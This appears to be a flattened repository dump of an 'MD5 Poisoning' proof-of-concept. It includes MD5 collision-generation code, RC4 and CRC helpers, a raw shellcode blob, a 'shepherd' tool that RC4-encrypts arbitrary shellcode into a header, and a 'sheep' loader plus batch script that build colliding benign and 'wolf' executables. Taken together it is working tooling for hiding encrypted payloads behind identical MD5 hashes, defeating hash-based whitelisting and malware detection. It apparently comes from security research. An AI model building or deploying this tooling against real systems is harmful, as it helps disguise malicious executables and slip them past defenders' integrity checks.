if((s.Q0[57] ^ s.Q1[57]) != 0x80000000) continue; /* D15 */ s.Q0[58] = RL(I(s.Q0[57], s.Q0[56], s.Q0[55]) + s.Q0[54] + s.X0[31] + 0xfe2ce6e0, 10) + s.Q0[57]; if((s.Q0[58] & 0x80000000) != (s.Q0[56] & 0x80000000)) continue; s.Q1[58] = RL(I(s.Q1[57], s.Q1[56], s.Q1[55]) + s.Q1[54] + s.X1[31] + 0xfe2ce6e0, 10) + s.Q1[57]; if((s.Q0[58] ^ s.Q1[58]) != 0x80000000) continue; /* C15 */ s.Q0[59] = RL(I(s.Q0[58], s.Q0[57], s.Q0[56]) + s.Q0[55] + s.X0[22] + 0xa3014314, 15) + s.Q0[58]; if((s.Q0[59] & 0x80000000) != (s.Q0[57] & 0x80000000)) continue; s.Q1[59] = RL(I(s.Q1[58], s.Q1[57], s.Q1[56]) + s.Q1[55] + s.X1[22] + 0xa3014314, 15) + s.Q1[58]; if((s.Q0[59] ^ s.Q1[59]) != 0x80000000) continue; /* B15 */ s.Q0[60] = RL(I(s.Q0[59], s.Q0[58], s.Q0[57]) + s.Q0[56] + s.X0[29] + 0x4e0811a1, 21) + s.Q0[59]; s.Q1[60] = RL(I(s.Q1[59], s.Q1[58], s.Q1[57]) + s.Q1[56] + s.X1[29] + 0x4e0811a1, 21) + s.Q1[59]; if((s.Q0[60] ^ s.Q1[60]) != 0x80000000) continue; /* A16 */ s.Q0[61] = RL(I(s.Q0[60], s.Q0[59], s.Q0[58]) + s.Q0[57] + s.X0[20] + 0xf7537e82, 6) + s.Q0[60]; s.Q1[61] = RL(I(s.Q1[60], s.Q1[59], s.Q1[58]) + s.Q1[57] + s.X1[20] + 0xf7537e82, 6) + s.Q1[60]; if((s.Q0[61] ^ s.Q1[61]) != 0x80000000) continue; if((s.A0 + s.Q0[61]) != (s.A1 + s.Q1[61])) continue; /* D16 */ s.Q0[62] = RL(I(s.Q0[61], s.Q0[60], s.Q0[59]) + s.Q0[58] + s.X0[27] + 0xbd3af235, 10) + s.Q0[61]; s.Q1[62] = RL(I(s.Q1[61], s.Q1[60], s.Q1[59]) + s.Q1[58] + s.X1[27] + 0xbd3af235, 10) + s.Q1[61]; if((s.D0 + s.Q0[62]) != (s.D1 + s.Q1[62])) continue; /* C16 */ s.Q0[63] = RL(I(s.Q0[62], s.Q0[61], s.Q0[60]) + s.Q0[59] + s.X0[18] + 0x2ad7d2bb, 15) + s.Q0[62]; s.Q1[63] = RL(I(s.Q1[62], s.Q1[61], s.Q1[60]) + s.Q1[59] + s.X1[18] + 0x2ad7d2bb, 15) + s.Q1[62]; if((s.C0 + s.Q0[63]) != (s.C1 + s.Q1[63])) continue; /* B16 */ s.Q0[64] = RL(I(s.Q0[63], s.Q0[62], s.Q0[61]) + s.Q0[60] + s.X0[25] + 0xeb86d391, 21) + s.Q0[63]; s.Q1[64] = RL(I(s.Q1[63], s.Q1[62], s.Q1[61]) + s.Q1[60] + s.X1[25] + 0xeb86d391, 21) + s.Q1[63]; if((s.B0 + s.Q0[64]) != (s.B1 + s.Q1[64])) continue; break; } if(i >= LOOP_22) goto block2_again; return 0; } /* public interface */ /* return 0 on success, 1 if interrupt requested */ int md5coll_with_iv(unsigned int IV[4], unsigned int m0[32], unsigned int m1[32], callback_t *cb) { int r; int ct1 = 0; while (1) { r = block1(IV, cb, ct1); if (r==1) { return 1; } r = block2(cb); if (r==1) { return 1; } else if (r==-1) { ct1 = s.ct1; continue; } else { break; } } memcpy(m0, s.X0, 128); memcpy(m1, s.X1, 128); return 0; } /* return 0 on success, 1 if interrupt requested */ int md5coll(unsigned int m0[32], unsigned int m1[32], callback_t *cb) { return md5coll_with_iv(IV_default, m0, m1, cb); } ================================================ FILE: evilize/md5coll_lib.h ================================================ /* MD5 Collision Generator * Copyright (C) 2005 Patrick Stach . * Implementation of paper by Xiaoyun Wang, et al. * A few optimizations to make the solving method a bit more deterministic. * Modifications Copyright (C) 2006 Peter Selinger. * * This work is licensed under a modified BSD License, see the file * MBSD-LICENSE for full details. * Any derivative works or references must cite the authors. */ /* object-oriented callback interface (for progress reports). "arg" is the payload of the callback, and f returns 1 if it wishes to interrupt. */ struct callback_s { int (*f)(void *priv, char *arg); void *priv; }; typedef struct callback_s callback_t; /* find an MD5 collision (with standard initial vector), and store it in m0/m1. Use callback function cb for progress reports (see above), if non-NULL. Return 0 on success, 1 if an interrupt was requested. */ int md5coll(unsigned int m0[32], unsigned int m1[32], callback_t *cb); /* same, but use specified initial vector */ int md5coll_with_iv(unsigned int IV[4], unsigned int m0[32], unsigned int m1[32], callback_t *cb); ================================================ FILE: fastcoll/_PUT_FASTCOLL_HERE_ ================================================ https://www.win.tue.nl/hashclash/ ================================================ FILE: msgbox.raw ================================================ t$1Ҳw1dq0v vF~ 68OuY`l$$E #include #define _min(x, y) ({ \ typeof(x) _min1 = (x); \ typeof(y) _min2 = (y); \ (void) (&_min1 == &_min2); \ _min1 < _min2 ? _min1 : _min2; }) #define _max(x, y) ({ \ typeof(x) _max1 = (x); \ typeof(y) _max2 = (y); \ (void) (&_max1 == &_max2); \ _max1 > _max2 ? _max1 : _max2; }) #define min3(x, y, z) ({ \ typeof(x) _min1 = (x); \ typeof(y) _min2 = (y); \ typeof(z) _min3 = (z); \ (void) (&_min1 == &_min2); \ (void) (&_min1 == &_min3); \ _min1 < _min2 ? (_min1 < _min3 ? _min1 : _min3) : \ (_min2 < _min3 ? _min2 : _min3); }) #define max3(x, y, z) ({ \ typeof(x) _max1 = (x); \ typeof(y) _max2 = (y); \ typeof(z) _max3 = (z); \ (void) (&_max1 == &_max2); \ (void) (&_max1 == &_max3); \ _max1 > _max2 ? (_max1 > _max3 ? _max1 : _max3) : \ (_max2 > _max3 ? _max2 : _max3); }) /** * min_not_zero - return the minimum that is _not_ zero, unless both are zero * @x: value1 * @y: value2 */ #define min_not_zero(x, y) ({ \ typeof(x) __x = (x); \ typeof(y) __y = (y); \ __x == 0 ? __y : ((__y == 0) ? __x : _min(__x, __y)); }) /** * clamp - return a value clamped to a given range with strict typechecking * @val: current value * @min: minimum allowable value * @max: maximum allowable value * * This macro does strict typechecking of min/max to make sure they are of the * same type as val. See the unnecessary pointer comparisons. */ #define clamp(val, min, max) ({ \ typeof(val) __val = (val); \ typeof(min) __min = (min); \ typeof(max) __max = (max); \ (void) (&__val == &__min); \ (void) (&__val == &__max); \ __val = __val < __min ? __min: __val; \ __val > __max ? __max: __val; }) #define min_t(type, x, y) ({ \ type __min1 = (x); \ type __min2 = (y); \ __min1 < __min2 ? __min1: __min2; }) #define max_t(type, x, y) ({ \ type __max1 = (x); \ type __max2 = (y); \ __max1 > __max2 ? __max1: __max2; }) /** * clamp_t - return a value clamped to a given range using a given type * @type: the type of variable to use * @val: current value * @min: minimum allowable value * @max: maximum allowable value * * This macro does no typechecking and uses temporary variables of type * 'type' to make all the comparisons. */ #define clamp_t(type, val, min, max) ({ \ type __val = (val); \ type __min = (min); \ type __max = (max); \ __val = __val < __min ? __min: __val; \ __val > __max ? __max: __val; }) /** * clamp_val - return a value clamped to a given range using val's type * @val: current value * @min: minimum allowable value * @max: maximum allowable value * * This macro does no typechecking and uses temporary variables of whatever * type the input argument 'val' is. This is useful when val is an unsigned * type and min and max are literals that will otherwise be assigned a signed * integer type. */ #define clamp_val(val, min, max) ({ \ typeof(val) __val = (val); \ typeof(val) __min = (min); \ typeof(val) __max = (max); \ __val = __val < __min ? __min: __val; \ __val > __max ? __max: __val; }) #define _swap(a, b) \ do { __typeof(a) __tmp = (a); (a) = (b); (b) = __tmp; } while (0) /** * container_of - cast a member of a structure out to the containing structure * @ptr: the pointer to the member. * @type: the type of the container struct this is embedded in. * @member: the name of the member within the struct. * */ #define container_of(ptr, type, member) ({ \ const typeof( ((type *)0)->member ) *__mptr = (ptr); \ (type *)( (char *)__mptr - __builtin_offsetof(type,member) );}) #define generic_compare(x, y) (((x) > (y)) - ((x) < (y))) /*static inline void memswp(unsigned long *x, unsigned long *y, size_t size) { unsigned long *p = x + size/sizeof(*x);; unsigned char *h, *v; while (x != p) { SWAP(*x, *y,unsigned long); x++; y++; } h = (unsigned char *)x; v = (unsigned char *)y; #if __WORDSIZE == 64 switch (size & 7) { case 7: _swap(h[6], v[6]); case 6: _swap(h[5], v[5]); case 5: _swap(h[4], v[4]); case 4: _swap(h[3], v[3]); #else switch (size & 3) { #endif case 3: _swap(h[2], v[2]); case 2: _swap(h[1], v[1]); case 1: _swap(h[0], v[0]); } }*/ #endif /* __ULIB_COMMON_H */ ================================================ FILE: sheep/crc.cpp ================================================ /********************************************************************** * * Filename: crc.c * * Description: Slow and fast implementations of the CRC standards. * * Notes: The parameters for each supported CRC standard are * defined in the header file crc.h. The implementations * here should stand up to further additions to that list. * * * Copyright (c) 2000 by Michael Barr. This software is placed into * the public domain and may be used for any purpose. However, this * notice must not be changed or removed and no warranty is either * expressed or implied by its publication or distribution. **********************************************************************/ #include "stdafx.h" #include "crc.h" /* * Derive parameters from the standard-specific parameters in crc.h. */ #define WIDTH (8 * sizeof(crc)) #define TOPBIT (1 << (WIDTH - 1)) #if (REFLECT_DATA == TRUE) #undef REFLECT_DATA #define REFLECT_DATA(X) ((unsigned char) reflect((X), 8)) #else #undef REFLECT_DATA #define REFLECT_DATA(X) (X) #endif #if (REFLECT_REMAINDER == TRUE) #undef REFLECT_REMAINDER #define REFLECT_REMAINDER(X) ((crc) reflect((X), WIDTH)) #else #undef REFLECT_REMAINDER #define REFLECT_REMAINDER(X) (X) #endif /********************************************************************* * * Function: reflect() * * Description: Reorder the bits of a binary sequence, by reflecting * them about the middle position. * * Notes: No checking is done that nBits <= 32. * * Returns: The reflection of the original data. * *********************************************************************/ static unsigned long reflect(unsigned long data, unsigned char nBits) { unsigned long reflection = 0x00000000; unsigned char bit; /* * Reflect the data about the center bit. */ for (bit = 0; bit < nBits; ++bit) { /* * If the LSB bit is set, set the reflection of it. */ if (data & 0x01) { reflection |= (1 << ((nBits - 1) - bit)); } data = (data >> 1); } return (reflection); } /* reflect() */ /********************************************************************* * * Function: crcSlow() * * Description: Compute the CRC of a given message. * * Notes: * * Returns: The CRC of the message. * *********************************************************************/ crc crcSlow(unsigned char const message[], int nBytes) { crc remainder = INITIAL_REMAINDER; int byte; unsigned char bit; /* * Perform modulo-2 division, a byte at a time. */ for (byte = 0; byte < nBytes; ++byte) { /* * Bring the next byte into the remainder. */ remainder ^= (REFLECT_DATA(message[byte]) << (WIDTH - 8)); /* * Perform modulo-2 division, a bit at a time. */ for (bit = 8; bit > 0; --bit) { /* * Try to divide the current data bit. */ if (remainder & TOPBIT) { remainder = (remainder << 1) ^ POLYNOMIAL; } else { remainder = (remainder << 1); } } } /* * The final remainder is the CRC result. */ return (REFLECT_REMAINDER(remainder) ^ FINAL_XOR_VALUE); } /* crcSlow() */ crc crcTable[256]; /********************************************************************* * * Function: crcInit() * * Description: Populate the partial CRC lookup table. * * Notes: This function must be rerun any time the CRC standard * is changed. If desired, it can be run "offline" and * the table results stored in an embedded system's ROM. * * Returns: None defined. * *********************************************************************/ void crcInit(void) { crc remainder; int dividend; unsigned char bit; /* * Compute the remainder of each possible dividend. */ for (dividend = 0; dividend < 256; ++dividend) { /* * Start with the dividend followed by zeros. */ remainder = dividend << (WIDTH - 8); /* * Perform modulo-2 division, a bit at a time. */ for (bit = 8; bit > 0; --bit) { /* * Try to divide the current data bit. */ if (remainder & TOPBIT) { remainder = (remainder << 1) ^ POLYNOMIAL; } else { remainder = (remainder << 1); } } /* * Store the result into the table. */ crcTable[dividend] = remainder; } } /* crcInit() */ /********************************************************************* * * Function: crcFast() * * Description: Compute the CRC of a given message. * * Notes: crcInit() must be called first. * * Returns: The CRC of the message. * *********************************************************************/ crc crcFast(unsigned char const message[], int nBytes) { crc remainder = INITIAL_REMAINDER; unsigned char data; int byte; /* * Divide the message by the polynomial, a byte at a time. */ for (byte = 0; byte < nBytes; ++byte) { data = REFLECT_DATA(message[byte]) ^ (remainder >> (WIDTH - 8)); remainder = crcTable[data] ^ (remainder << 8); } /* * The final remainder is the CRC. */ return (REFLECT_REMAINDER(remainder) ^ FINAL_XOR_VALUE); } /* crcFast() */ ================================================ FILE: sheep/crc.h ================================================ /********************************************************************** * * Filename: crc.h * * Description: A header file describing the various CRC standards. * * Notes: * * * Copyright (c) 2000 by Michael Barr. This software is placed into * the public domain and may be used for any purpose. However, this * notice must not be changed or removed and no warranty is either * expressed or implied by its publication or distribution. **********************************************************************/ #ifndef _crc_h #define _crc_h #define FALSE 0 #define TRUE !FALSE /* * Select the CRC standard from the list that follows. */ #define CRC_CCITT #if defined(CRC_CCITT) typedef unsigned short crc; #define CRC_NAME "CRC-CCITT" #define POLYNOMIAL 0x1021 #define INITIAL_REMAINDER 0xFFFF #define FINAL_XOR_VALUE 0x0000 #define REFLECT_DATA FALSE #define REFLECT_REMAINDER FALSE #define CHECK_VALUE 0x29B1 #elif defined(CRC16) typedef unsigned short crc; #define CRC_NAME "CRC-16" #define POLYNOMIAL 0x8005 #define INITIAL_REMAINDER 0x0000 #define FINAL_XOR_VALUE 0x0000 #define REFLECT_DATA TRUE #define REFLECT_REMAINDER TRUE #define CHECK_VALUE 0xBB3D #elif defined(CRC32) typedef unsigned long crc; #define CRC_NAME "CRC-32" #define POLYNOMIAL 0x04C11DB7 #define INITIAL_REMAINDER 0xFFFFFFFF #define FINAL_XOR_VALUE 0xFFFFFFFF #define REFLECT_DATA TRUE #define REFLECT_REMAINDER TRUE #define CHECK_VALUE 0xCBF43926 #else #error "One of CRC_CCITT, CRC16, or CRC32 must be #define'd." #endif void crcInit(void); crc crcSlow(unsigned char const message[], int nBytes); crc crcFast(unsigned char const message[], int nBytes); #endif /* _crc_h */ ================================================ FILE: sheep/rc4.cpp ================================================ #include "stdafx.h" #include "common.h" #include "rc4.h" #define SWAP(x, y, T) do { T SWAP = x; x = y; y = SWAP; } while (0) void rc4_set_key(const unsigned char *buf, size_t len, rc4_key_t * key) { unsigned char j = 0; unsigned char *state = key->state; int i; for (i = 0; i < 256; ++i) state[i] = i; key->x = 0; key->y = 0; for (i = 0; i < 256; ++i) { j = j + state[i] + buf[i % len]; SWAP(state[i], state[j],unsigned char); } } void rc4_crypt(unsigned char *buf, size_t len, rc4_key_t * key) { unsigned char x; unsigned char y; unsigned char *state = key->state; unsigned int i; x = key->x; y = key->y; for (i = 0; i < len; i++) { y = y + state[++x]; SWAP(state[x], state[y],unsigned char); buf[i] ^= state[(state[x] + state[y]) & 0xff]; } key->x = x; key->y = y; } ================================================ FILE: sheep/rc4.h ================================================ /* The MIT License Copyright (C) 2011 Zilong Tan (tzlloch@gmail.com) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ #ifndef __ULIB_RC4_H #define __ULIB_RC4_H #include typedef struct rc4_key_t { unsigned char state[256]; unsigned char x; unsigned char y; } rc4_key_t; #ifdef __cplusplus extern "C" { #endif void rc4_set_key(const unsigned char *key_data, size_t key_data_len, rc4_key_t * key); void rc4_crypt(unsigned char *buffer, size_t buffer_len, rc4_key_t * key); #ifdef __cplusplus } #endif #endif /* __RC4_H */ ================================================ FILE: sheep/sheep.cpp ================================================ /* MD5 Poisoning - Wolves Among the Sheep Copyright (C) 2015 Blint Varga-Perke This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . */ #include "stdafx.h" #include #include #include "rc4.h" #include "crc.h" #include "sc.h" #define DUMMY "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" char *dummya = DUMMY "A"; char *dummyb = DUMMY "B"; unsigned char code[]=SC; int _tmain(int argc, _TCHAR* argv[]) { unsigned char key[]=SC_KEY; char* dummya_c=dummya; char* dummyb_c=dummyb; for (int i=0;i Debug Win32 Release Win32 {D17FD857-B64C-4C1B-A893-92E531CC0210} Win32Proj sheep Application true v110 Unicode Application false v110 true Unicode true false Use Level3 Disabled WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreadedDebug Console true Level3 Use MaxSpeed true true WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreaded Console true true true Create Create ================================================ FILE: sheep/sheep.vcxproj.filters ================================================  {4FC737F1-C7A5-4376-A066-2A32D752A2FF} cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx {93995380-89BD-4b04-88EB-625FBE52EBFB} h;hpp;hxx;hm;inl;inc;xsd {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms Header Files Header Files Header Files Header Files Source Files Source Files ================================================ FILE: sheep/stdafx.cpp ================================================ // stdafx.cpp : source file that includes just the standard includes // sheep.pch will be the pre-compiled header // stdafx.obj will contain the pre-compiled type information #include "stdafx.h" // TODO: reference any additional headers you need in STDAFX.H // and not in this file ================================================ FILE: sheep/stdafx.h ================================================ // stdafx.h : include file for standard system include files, // or project specific include files that are used frequently, but // are changed infrequently // #pragma once #include "targetver.h" #include #include // TODO: reference additional headers your program requires here ================================================ FILE: sheep/targetver.h ================================================ #pragma once // Including SDKDDKVer.h defines the highest available Windows platform. // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. #include ================================================ FILE: sheep.sln ================================================  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio Express 2012 for Windows Desktop Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sheep", "sheep\sheep.vcxproj", "{D17FD857-B64C-4C1B-A893-92E531CC0210}" EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shepherd", "shepherd\shepherd.vcxproj", "{A4F18160-3822-4E64-95F5-8FA4D6BDDD0A}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 Release|Win32 = Release|Win32 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {D17FD857-B64C-4C1B-A893-92E531CC0210}.Debug|Win32.ActiveCfg = Debug|Win32 {D17FD857-B64C-4C1B-A893-92E531CC0210}.Debug|Win32.Build.0 = Debug|Win32 {D17FD857-B64C-4C1B-A893-92E531CC0210}.Release|Win32.ActiveCfg = Release|Win32 {D17FD857-B64C-4C1B-A893-92E531CC0210}.Release|Win32.Build.0 = Release|Win32 {A4F18160-3822-4E64-95F5-8FA4D6BDDD0A}.Debug|Win32.ActiveCfg = Debug|Win32 {A4F18160-3822-4E64-95F5-8FA4D6BDDD0A}.Debug|Win32.Build.0 = Debug|Win32 {A4F18160-3822-4E64-95F5-8FA4D6BDDD0A}.Release|Win32.ActiveCfg = Release|Win32 {A4F18160-3822-4E64-95F5-8FA4D6BDDD0A}.Release|Win32.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection EndGlobal ================================================ FILE: shepherd/ReadMe.txt ================================================ ======================================================================== CONSOLE APPLICATION : shepherd Project Overview ======================================================================== AppWizard has created this shepherd application for you. This file contains a summary of what you will find in each of the files that make up your shepherd application. shepherd.vcxproj This is the main project file for VC++ projects generated using an Application Wizard. It contains information about the version of Visual C++ that generated the file, and information about the platforms, configurations, and project features selected with the Application Wizard. shepherd.vcxproj.filters This is the filters file for VC++ projects generated using an Application Wizard. It contains information about the association between the files in your project and the filters. This association is used in the IDE to show grouping of files with similar extensions under a specific node (for e.g. ".cpp" files are associated with the "Source Files" filter). shepherd.cpp This is the main application source file. ///////////////////////////////////////////////////////////////////////////// Other standard files: StdAfx.h, StdAfx.cpp These files are used to build a precompiled header (PCH) file named shepherd.pch and a precompiled types file named StdAfx.obj. ///////////////////////////////////////////////////////////////////////////// Other notes: AppWizard uses "TODO:" comments to indicate parts of the source code you should add to or customize. ///////////////////////////////////////////////////////////////////////////// ================================================ FILE: shepherd/shepherd.cpp ================================================ /* MD5 Poisoning - Wolves Among the Sheep Copyright (C) 2015 Blint Varga-Perke This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . */ #include "stdafx.h" #include "rc4.h" #include "crc.h" #include #include #include int main(int argc, char* argv[]) { if (argc<3){ printf("Usage: %s [KEY] [shellcode.raw]\n"); return -1; } unsigned char* key=(unsigned char*)argv[1]; std::ifstream in(argv[2]); std::string contents((std::istreambuf_iterator(in)),std::istreambuf_iterator()); rc4_key_t rc4_key; rc4_set_key(key,strlen((const char*)key),&rc4_key); unsigned char* crypted=(unsigned char*)malloc(contents.length()*sizeof(unsigned char)); memset(crypted,0,contents.length()*sizeof(unsigned char)); rc4_crypt(crypted,contents.length(),&rc4_key); printf("#define SC {"); for (int i=0;i (contents.c_str()); printf("#define SC_KEY \"%s\"\n\n",key); printf("#define SC_CRC %d \n\n",crcSlow(contents_buf,contents.length())); return 0; } ================================================ FILE: shepherd/shepherd.vcxproj ================================================  Debug Win32 Release Win32 {A4F18160-3822-4E64-95F5-8FA4D6BDDD0A} Win32Proj shepherd Application true v110 Unicode Application false v110 true Unicode true true Use Level3 Disabled WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) true ..\sheep\ MultiThreadedDebug Console true Level3 Use Disabled true false WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true ..\sheep\ false MultiThreaded Console true true true Create Create ================================================ FILE: shepherd/shepherd.vcxproj.filters ================================================  {4FC737F1-C7A5-4376-A066-2A32D752A2FF} cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx {93995380-89BD-4b04-88EB-625FBE52EBFB} h;hpp;hxx;hm;inl;inc;xsd {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms Header Files Header Files Header Files Header Files Header Files Source Files Source Files Source Files Source Files ================================================ FILE: shepherd/stdafx.cpp ================================================ // stdafx.cpp : source file that includes just the standard includes // shepherd.pch will be the pre-compiled header // stdafx.obj will contain the pre-compiled type information #include "stdafx.h" // TODO: reference any additional headers you need in STDAFX.H // and not in this file ================================================ FILE: shepherd/stdafx.h ================================================ // stdafx.h : include file for standard system include files, // or project specific include files that are used frequently, but // are changed infrequently // #pragma once #include "targetver.h" #include #include // TODO: reference additional headers your program requires here ================================================ FILE: shepherd/targetver.h ================================================ #pragma once // Including SDKDDKVer.h defines the highest available Windows platform. // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. #include ================================================ FILE: shepherd.bat ================================================ @echo on del sheep\Release\sheep.pch Release\shepherd.exe %1 %2 > sheep\sc.h msbuild /p:Configuration=Release /t:Build sheep\sheep.vcxproj del evilize\a del evilize\b del evilize\wolf.exe del evilize\sheep.exe cd evilize evilize.exe ..\sheep\Release\sheep.exe